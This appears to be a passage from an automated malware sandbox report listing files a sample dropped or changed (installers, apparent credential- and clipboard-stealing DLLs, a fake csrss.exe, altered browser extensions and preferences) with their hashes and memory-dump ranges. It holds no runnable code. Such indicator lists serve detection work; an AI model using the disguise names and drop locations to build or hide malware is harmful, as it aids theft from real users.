SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

C:\Users\Admin\AppData\Local\Temp\7zS2C5.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

C:\Users\Admin\AppData\Local\Temp\7zS2C5.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/5264-636-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

memory/5336-643-0x0000000000A20000-0x0000000000A28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS2C5.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

C:\Users\Admin\AppData\Local\Temp\K.exe

MD5 ac65407254780025e8a71da7b925c4f3
SHA1 5c7ae625586c1c00ec9d35caa4f71b020425a6ba
SHA256 26cd9cc9a0dd688411a4f0e2fa099b694b88cab6e9ed10827a175f7b5486e42e
SHA512 27d87730230d9f594908f904bf298a28e255dced8d515eb0d97e1701078c4405f9f428513c2574d349a7517bd23a3558fb09599a01499ea54590945b981b17ab

C:\Users\Admin\AppData\Local\Temp\K.exe

MD5 ac65407254780025e8a71da7b925c4f3
SHA1 5c7ae625586c1c00ec9d35caa4f71b020425a6ba
SHA256 26cd9cc9a0dd688411a4f0e2fa099b694b88cab6e9ed10827a175f7b5486e42e
SHA512 27d87730230d9f594908f904bf298a28e255dced8d515eb0d97e1701078c4405f9f428513c2574d349a7517bd23a3558fb09599a01499ea54590945b981b17ab

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/1020-645-0x00000000733A0000-0x0000000073A8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp

MD5 e57693101a63b1f934f462bc7a2ef093
SHA1 2748ea8c66b980f14c9ce36c1c3061e690cf3ce7
SHA256 71267ff94c9fc72cbffaeed3bc2f33cef1eeb1887c29c574d7f26595d1a6235f
SHA512 3dcda686a85b19a9c7b4c96d132e90ed43c7df13ce9456beb2b88c278d8068cc3abcbfe25b1607c7b8281d276efb24809730f352927b326254f3208cbdf54a3e

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5336-662-0x000000001B630000-0x000000001B640000-memory.dmp

memory/5336-660-0x00007FF82BB70000-0x00007FF82C55C000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5444-678-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-P7SG9.tmp\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-P7SG9.tmp\_isdecmp.dll

MD5 7cee19d7e00e9a35fc5e7884fd9d1ad8
SHA1 2c5e8de13bdb6ddc290a9596113f77129ecd26bc
SHA256 58ee49d4b4f6def91c6561fc5a1b73bc86d8a01b23ce0c8ddbf0ed11f13d5ace
SHA512 a6955f5aff467f199236ed8a57f4d97af915a3ae81711ff8292e66e66c9f7ee307d7d7aafce09a1bd33c8f7983694cb207fc980d6c3323b475de6278d37bdde8

\Users\Admin\AppData\Local\Temp\is-P7SG9.tmp\_isdecmp.dll

MD5 7cee19d7e00e9a35fc5e7884fd9d1ad8
SHA1 2c5e8de13bdb6ddc290a9596113f77129ecd26bc
SHA256 58ee49d4b4f6def91c6561fc5a1b73bc86d8a01b23ce0c8ddbf0ed11f13d5ace
SHA512 a6955f5aff467f199236ed8a57f4d97af915a3ae81711ff8292e66e66c9f7ee307d7d7aafce09a1bd33c8f7983694cb207fc980d6c3323b475de6278d37bdde8

C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp

MD5 e57693101a63b1f934f462bc7a2ef093
SHA1 2748ea8c66b980f14c9ce36c1c3061e690cf3ce7
SHA256 71267ff94c9fc72cbffaeed3bc2f33cef1eeb1887c29c574d7f26595d1a6235f
SHA512 3dcda686a85b19a9c7b4c96d132e90ed43c7df13ce9456beb2b88c278d8068cc3abcbfe25b1607c7b8281d276efb24809730f352927b326254f3208cbdf54a3e

memory/3404-626-0x00000000733A0000-0x0000000073A8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

memory/5604-702-0x0000000001230000-0x000000000191F000-memory.dmp

memory/5708-704-0x0000000000400000-0x0000000000627000-memory.dmp

memory/5708-709-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2324-711-0x00000000733A0000-0x0000000073A8E000-memory.dmp

memory/2324-706-0x0000000000400000-0x000000000047E000-memory.dmp

memory/5804-712-0x0000000000400000-0x0000000000627000-memory.dmp

memory/5264-719-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2900-720-0x0000000000B40000-0x0000000000C40000-memory.dmp

memory/2900-724-0x00000000008B0000-0x00000000008B9000-memory.dmp

memory/5944-725-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5336-726-0x00007FF82BB70000-0x00007FF82C55C000-memory.dmp

memory/1824-728-0x0000000002950000-0x0000000002D4B000-memory.dmp

memory/5336-730-0x000000001B630000-0x000000001B640000-memory.dmp

memory/1824-729-0x0000000002E50000-0x000000000373B000-memory.dmp

memory/1824-731-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5444-733-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/5604-734-0x0000000001230000-0x000000000191F000-memory.dmp

memory/5196-741-0x0000000001120000-0x0000000001130000-memory.dmp

memory/5196-740-0x00000000733A0000-0x0000000073A8E000-memory.dmp

memory/5196-739-0x00000000068E0000-0x0000000006916000-memory.dmp

memory/5196-742-0x0000000001120000-0x0000000001130000-memory.dmp

memory/5196-743-0x0000000006F50000-0x0000000007578000-memory.dmp

memory/5196-744-0x0000000006EE0000-0x0000000006F02000-memory.dmp

memory/5196-745-0x00000000076F0000-0x0000000007756000-memory.dmp

memory/5196-747-0x00000000079F0000-0x0000000007A56000-memory.dmp

memory/5944-752-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5196-753-0x0000000007A60000-0x0000000007DB0000-memory.dmp

memory/5196-755-0x00000000079C0000-0x00000000079DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbo4kr4y.ngz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5196-775-0x0000000008250000-0x000000000828C000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\DX4VKI2H\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Roaming\adbtitb

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Windows\rss\csrss.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 6d7ab52010791b5256e474228f13410b
SHA1 dd10373fa97722fdf72d3c707eb224ed1af63bed
SHA256 0b78f473b7d7dab040d5cb4d46473da96719c576bff2a540215e39b771fdc3b5
SHA512 03f846eb06de411ba66cf00aaf24e83efd90369bb19b3dcbe7fc3d46aeb65a417ab7d060e0dbbee3017f9459fe325287698682550c62c02c15233228ad0fae58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u5fl9cze.default-release\prefs.js

MD5 3b669399ddfc6f56646cd9cdc5e37f27
SHA1 f2aebbbe53cae0e11d90f7f01fd8ef8cc46ada6f
SHA256 73988f6cef9c6e7d9a8c7ebefa1369d706c0f2ff7ade017970ed3e0679e35236
SHA512 7352be9417af1609522db0680032b82e07627ed9140d2aef764c751df547d1715c6acbd281508a604bda1d61e44ad01d9b6dad5541fb100a09baf41dc8b5b024

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 9c7ba43a2d90362c7a917d11724eb7b0
SHA1 fbfba781b335dc91c4f63d00dc544e83f036c6db
SHA256 247e10ec652c5b188a26c96e97fa7d50c866cdb01433e3119de937d2e3285d94
SHA512 4bce2b16b606156854e8fcfee1fc0cbec0b0f94e1e84e7f404c35c478b84820268dee8d15534b38d7573863005bf72215c7e22831c81395e8498d87bf680beae